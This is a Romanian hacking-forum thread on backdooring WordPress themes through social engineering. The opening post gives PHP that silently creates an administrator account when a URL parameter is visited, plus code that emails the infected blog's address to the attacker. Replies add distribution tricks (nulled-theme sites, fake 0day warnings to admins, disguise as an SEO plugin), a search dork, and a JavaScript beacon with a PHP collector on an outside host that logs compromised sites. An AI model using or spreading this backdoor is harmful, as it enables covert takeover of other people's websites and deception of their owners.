Jump to content
The.Legend

Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale

Recommended Posts

Posted (edited)

Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale.

Sun? foarte frumos ?i defapt este foarte u?or. Tutorialul ce l-am creat ast?zi pentru voi nu este o idee proprie. M-am inspirat din ceva ce am citit acum foarte mult timp, un scenariu foarte bine pus la punct legat de WordPress ?i anume, cum putem s? lu?m acces la un blog cu elegan?? ?i f?r? a l?sa urme ca s? î?i de-a seama proprietarul.

S? d?m un mic exemplu. Domnul Gheorghe vrea s? sparg? cât mai multe blog-uri de pe o anumit? ni?? web. Se gânde?te cum s? fac? un lucru de genul ?sta. Noroc c? Gheorghe este foarte inventiv ?i i-a venit în minte s? creeze ?i s? "infecteze" o tem? (theme) visual?.

Mul?i o s? spune?i c? o s? creeze un Remote Code / Command Execution (RCE). Dar nu. Pentru c? ar l?sa urme. A?a c? va ad?uga în tem? un cod PHP care s? adauge automat un nou cont cu drepturi de administrator. Codul este urm?torul:

add_action('wp_head', 'wp_wordpress');function wp_wordpress() {If ($_GET['p'] == '1') {require('wp-includes/registration.php');if (!username_exists('wordpress')) {$user_id = wp_create_user('Guest', 'password');$user = new WP_User($user_id);$user->set_role('administrator');}}}

Ce face codul de mai sus? Dac? este ad?ugat spre exemplu în templates.php (am precizat aceast? fil? deoarece este executat? automat când acces?m index-ul unui blog), oricine va intra pe urm?torul link: http://pentesting/wp/?p=1 (primul articol de pe blog) va crea în baza de date un nou cont cu drepturi de administrator ?i cu numele: Guest ?i parola password. O remarc? important? ar fi aceea c? tema instalat? trebuie s? fie ?i cea activ?.

Legat de ingineria social? v? descurca?i voi c? sunte?i baie?i iste?i cu mult timp liber. Pute?i posta online undeva tema ?i s? adauga?i undeva anumite cuvinte pentru a crea un dork s? pute?i g?si blog-urile infectate. Sau îl pute?i manipula chiar pe administrator s? instaleze tema.

Update

Ok. Ca s? fie totul complet ?i pentru c? nu am fost mul?umit parc? dac? nu ajutam ?i cu partea asta, adic? cea în care sunte?i informa?i cu ce blog a fost infectat, pe email.

<?php
add_action('wp_head','wp_wordpressmail');function wp_wordpressmail(){
if ( is_user_logged_in() ) {
if(!username_exists('wordpress')){
$addr='the.legend@domain.tld'; # Aici pune?i adresa voastr? de email
$judul='WP URL';
wp_mail($addr,$judul,get_bloginfo('wpurl'));
}
}
}
?>

S? v? bucura?i de metod?. ?i ca s? nu v? de-a de gol adresa de mail, pute?i s? o encripta?i în base64.

$addr=base64_decode('#Aici va fi email-ul vostru encriptat în base64');

S? nu uita?i s? sterge?i tag-urile PHP când ad?uga?i în fil?.

Baft?.

Edited by The.Legend
  • Upvote 1
Posted

Si de ce are titlul asta magnific a la tinkode?

Ar trebui numit: Cum sa faci o tema infectata in WP care sa creeze un user nou cu drepturi de admin. :-?

Sincer acum. Sa bagi 2-3 linii de cod care sa actioneze ca shell nu e "rocket science". Problema e cum sa pacalesti pe toata lumea sa-si instaleze tema ta.(lucru ft greu de facut).

Posted (edited)
Si de ce are titlul asta magnific a la tinkode?

Ar trebui numit: Cum sa faci o tema infectata in WP care sa creeze un user nou cu drepturi de admin. :-?

Sincer acum. Sa bagi 2-3 linii de cod care sa actioneze ca shell nu e "rocket science". Problema e cum sa pacalesti pe toata lumea sa-si instaleze tema ta.(lucru ft greu de facut).

Ce leg?tur? are TinKode cu thread-ul ?sta? Nu îi pute?i da pace? ?i titlul este ales cu precizie deoarece f?r? inginerie social? nu vei putea crea acel cont de administrator. M? în?elegi acum?

Lucrurile grele se rezolv? cu metode simple dar puternice.

Legat de p?c?lit cum nume?ti tu, po?i crea o tem? proprie cu anumite cuvinte cheie (inclusiv numele temei) pentru a crea un dork s? cau?i cu el pe google. Dac? eu am un blog personal sau un site de prezentare bazat pe WordPress, automat c? primul lucru pe care îl voi face ar fi cel de a avea o tem? vizual? în concordan?? cu tematica blog-ului.

Sau alta ar fi s? anun?i un administrator de blog c? este vulnerabil la un 0day din cauza temei ce o folose?te (înainte de asta, o descarci ?i o infectezi), ?i îi propui s? î?i fac? un update la ea cu ce îi dai tu. Evident c? situa?ia sau discu?ia va fi mult mai elaborat?.

Edited by The.Legend
Posted
Ce leg?tur? are TinKode cu thread-ul ?sta? Nu îi pute?i da pace? ?i titlul este ales cu precizie deoarece f?r? inginerie social? nu vei putea crea acel cont de administrator. M? în?elegi acum?

Lucrurile grele se rezolv? cu metode simple dar puternice.

Legat de p?c?lit cum nume?ti tu, po?i crea o tem? proprie cu anumite cuvinte cheie (inclusiv numele temei) pentru a crea un dork s? cau?i cu el pe google. Dac? eu am un blog personal sau un site de prezentare bazat pe WordPress, automat c? primul lucru pe care îl voi face ar fi cel de a avea o tem? vizual? în concordan?? cu tematica blog-ului.

Sau alta ar fi s? anun?i un administrator de blog c? este vulnerabil la un 0day din cauza temei ce o folose?te (înainte de asta, o descarci ?i o infectezi), ?i îi propui s? î?i fac? un update la ea cu ce îi dai tu. Evident c? situa?ia sau discu?ia va fi mult mai elaborat?.

Dork : inurl:"wp-TEMA"

Posted

criptezi cu ceva chestia asta :


add_action('wp_head', 'wp_wordpress');function wp_wordpress() {If ($_GET['p'] == '1') {require('wp-includes/registration.php');if (!username_exists('wordpress')) {$user_id = wp_create_user('Guest', 'password');$user = new WP_User($user_id);$user->set_role('administrator');}}}

trimiti un email cum ca tu ai fi de la hosting si pentru un trafic ranking nu stiu ce sa puna asta in template.php . asta ar fi o idee

Posted

Foarte frumoasa ideea. E un inceput la niste lucruri care pot sa le faci mai departe. Un exemplu ar fi sa distribui tema la N site-uri cu teme, etc, cu o functie de mail sau POST sa te anunte ca e gata.

Posted

Pute?i desc?rca o tem? premium ?i s? o pune?i în locuri gen scriptmafia.com sau warez-bb.org. Sunt sute de mii de bloggeri care au gusturi diferite. Printre aceia se vor num?ra ?i al?ii care s? instaleze tema voastr?.

Posted

Mesaj adresat celor care au postat in topicul asta si au dubii asupra metodei.

O metoda "spoonfeded":

1. Cumparati o tema care nu se gaseste nulled pe net de pe ThemeForest

2. Puneti backdoor-ul in tema cumparata

3. Ii dati submit pe site-uri care se ocupa cu scripturi/teme NULLED

E ASA GREU?

Posted

Tu ne-ai dat codul, nu ne-ai explicat cum sa-l folosim. <- 0% SE

Deci poti sa scoti din titlu "Inginerie Sociala" ( care btw suna ca un c***t in Limba Romana ).

PS: No hate or w/e, am vrut doar sa fiu scurt si la obiect :).

Posted
Tu ne-ai dat codul, nu ne-ai explicat cum sa-l folosim. <- 0% SE

Deci poti sa scoti din titlu "Inginerie Sociala" ( care btw suna ca un c***t in Limba Romana ).

PS: No hate or w/e, am vrut doar sa fiu scurt si la obiect :).

?i-am explicat în mare procedeul prin care poate fi pus? în aplicare ideea mea. Fiecare poate dezvolta ideea ca s? î?i îndeplineasc? scopul. Pe scurt pot spune c? am dat un exemplu de inginerie social?. Dac? spui c? sun? ca naiba în român? înseamn? c? insul?i un întreg popor. Dac? a? fi în locul compatrio?ilor t?i a? avea o p?rere de toat? jena fa?? de tine. Baft? pu?tiule.

Posted

Va faceti o pagina de trimis mail(ca sa nu trimiteti voi direct mail, sa nu dea de banuit) iar dupa o puteti accesa din tema cu javascript(preferabil deoarece cu file_get_contents puteti intampina probleme), acea pagina primeste un parametru cu site-ul de unde a venit REQUEST-ul iar in caz ca nu s-a trimis deja mail cu acel site trimiteti mail-ul si s-a terminat toata treaba :)

Posted

Uite ceva silentios :)

Consta in crearea unei imagini pentru a face REQUEST-ul iar un fisier PHP adauga site-ul intr-un fisier TXT in caz ca nu exista deja. Nu stau sa comentez scriptul, sunt chestii prea simple pentru a fi comentate.

Cod JavaScript:

var img = new Image(1,1); 
img.src = 'http://www.anunta-site-spart.com/anunta.php?locatie='+encodeURIComponent(window.location);

Cod PHP de la http://www.anunta-site-spart.com/anunta.php :


<?php
# fisier: /anunta.php
# Scopuri educative si bla bla bla

$fh = fopen('siteuri-sparte.txt','a+b');
preg_match('/https?:\/\/(www\.|)([a-zA-Z0-9\-\.]*)/i', $_GET['locatie'], $bucati_din_adresa);

$linii = array();
while( ($linie = fgets($fh)) !== false ){
$linii[] = $linie;
}

if(!in_array($bucati_din_adresa[2], $linii)){
fwrite($fh, $bucati_din_adresa[2].PHP_EOL);
}

fclose($fh);
?>

Posted

Î?i mul?umesc mult c? te-ai implicat ?i c? ai oferit o mân? de ajutor. Deci acum avem tot ce ne trebuie. Metoda. Ideea prin care putem face inginerie social?, ?i cum s? fim alerta?i când un blogger ?i-a instalat tema noastr? infectat?.

Dac? cineva reu?e?te s? pun? în aplicare acest tutorial, îl rog s? lase aici un reply cu p?rerea lui. Cum a fost, greu sau u?or, s.a.m.d.

Posted (edited)

Ok. Ca s? fie totul complet ?i pentru c? nu am fost mul?umit parc? dac? nu ajutam ?i cu partea asta, adic? cea în care sunte?i informa?i cu ce blog a fost infectat, pe email.

<?php
add_action('wp_head','wp_wordpressmail');function wp_wordpressmail(){
if ( is_user_logged_in() ) {
if(!username_exists('wordpress')){
$addr='the.legend@domain.tld'; # Aici pune?i adresa voastr? de email
$judul='WP URL';
wp_mail($addr,$judul,get_bloginfo('wpurl'));
}
}
}
?>

S? v? bucura?i de metod?. ?i ca s? nu v? de-a de gol adresa de mail, pute?i s? o encripta?i în base64.

$addr=base64_decode('#Aici va fi email-ul vostru encriptat în base64');

S? nu uita?i s? sterge?i tag-urile PHP când ad?uga?i în fil?. Baft?.

Edited by The.Legend
Posted

ca sa profitam mai mult de el,n-ai putea sa-l faci in asa fel incat sa-l punem intr-un plugin nou/existent(adica editam unu deja functional) si sa spunem ca ajuta la seo/commenturi etc,asa cred ca merge mult mai usor sa faci pe cineva sa-l instaleze,asta daca ati inteles la ce-am vrut sa ma refer :))

Posted (edited)
Uite ceva silentios :)

Consta in crearea unei imagini pentru a face REQUEST-ul iar un fisier PHP adauga site-ul intr-un fisier TXT in caz ca nu exista deja. Nu stau sa comentez scriptul, sunt chestii prea simple pentru a fi comentate.

Cod JavaScript:

var img = new Image(1,1); 
img.src = 'http://www.anunta-site-spart.com/anunta.php?locatie='+encodeURIComponent(window.location);

Cod PHP de la http://www.anunta-site-spart.com/anunta.php :


<?php
# fisier: /anunta.php
# Scopuri educative si bla bla bla

$fh = fopen('siteuri-sparte.txt','a+b');
preg_match('/https?:\/\/(www\.|)([a-zA-Z0-9\-\.]*)/i', $_GET['locatie'], $bucati_din_adresa);

$linii = array();
while( ($linie = fgets($fh)) !== false ){
$linii[] = $linie;
}

if(!in_array($bucati_din_adresa[2], $linii)){
fwrite($fh, $bucati_din_adresa[2].PHP_EOL);
}

fclose($fh);
?>

da intradevar,e ceva silentios si merge doar ca in "siteuri-sparte.txt" imi vine doar numele siteului

ex: siteulmeu.ro

eu vreau sa imi vina si patch... unde a fost uploadat

ex: siteulmeu.ro/site/images/

aveti vre-o solutie pentru mine :-/

P.S: am rezolvat,multumiri lui eusimplu

Edited by FaramirSV

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...